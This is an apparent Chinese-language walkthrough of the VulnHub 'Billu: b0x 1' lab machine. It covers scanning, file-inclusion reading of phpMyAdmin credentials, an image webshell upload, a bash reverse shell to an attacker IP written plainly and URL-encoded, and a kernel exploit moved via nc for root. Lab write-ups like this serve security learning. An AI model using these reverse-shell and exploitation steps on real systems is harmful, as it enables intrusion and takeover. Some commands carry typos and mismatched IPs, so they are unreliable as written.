VULNHUB BILLU：B0X 1演练

 

点击查看作者原文链接

target IP:不详

1.

先使用nmap扫描局域网内cunhuoz主机，进行排查

排查后的到靶机IP为192.168.171.154

使用dirb扫描目录

逐个进行排查，

发现使用phpmyadmin管理数据库

发现192.168.171.154/in页面为phpinfo，搜索www找到绝对路径

发现192.168.171.154/test页面中可能存在文件包含漏洞

尝试下载phpmyadmin配置文件

无法下载，改为POST请求

下载成功，打开发现root及其密码

得到root密码，进行SSH连接，

成功！getshell

2.

用burp抓包 c.php时，发现数据库账号密码

尝试登录phpmyadmin

登陆成功，发现phpmyadmin版本号3.4.7

searchsploit phpmyadmin 3.4发现可利用的POC

 

 

 

 

 

 

 

在phmyadmin中查看web账号密码

登录web页面，查看功能，发现有上传，尝试上传木马

图片马成功

上面审计panel.php中，也发现文件包含漏洞，可以传一个load

解析13.jpg,cmd赋值whoami,执行成功

发现用户身份为wwwdata,权限不足，开始写入反弹shell，进行提权

kali开启监听

反弹shell命令，直接输入尝试不行，需要URL编码一下

echo “bash -i >& /dev/tcp/192.168.171.157/4444 >&1” | bash

%65%63%68%6F%20%22%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%31%37%31%2E%31%35%36%2F%34%34%34%34%20%30%3E%26%31%22%20%7C%20%62%61%73%68

 

 

 

 

 

 

kali收到

lsb release -a命令无法使用，uname -a查看版本号，搜索相应的提权方式

searchsploit 3.13 找到提权poc

使用nc命令将37292.c传至靶机

kali：nc -q 1 -lp 333 < 37292.c

靶机: nv -nv 192.168.171.156 333 > 37292.c

查看用法

靶机gcc命令进行编译 gcc 37292.c -o exp

执行

获得root权限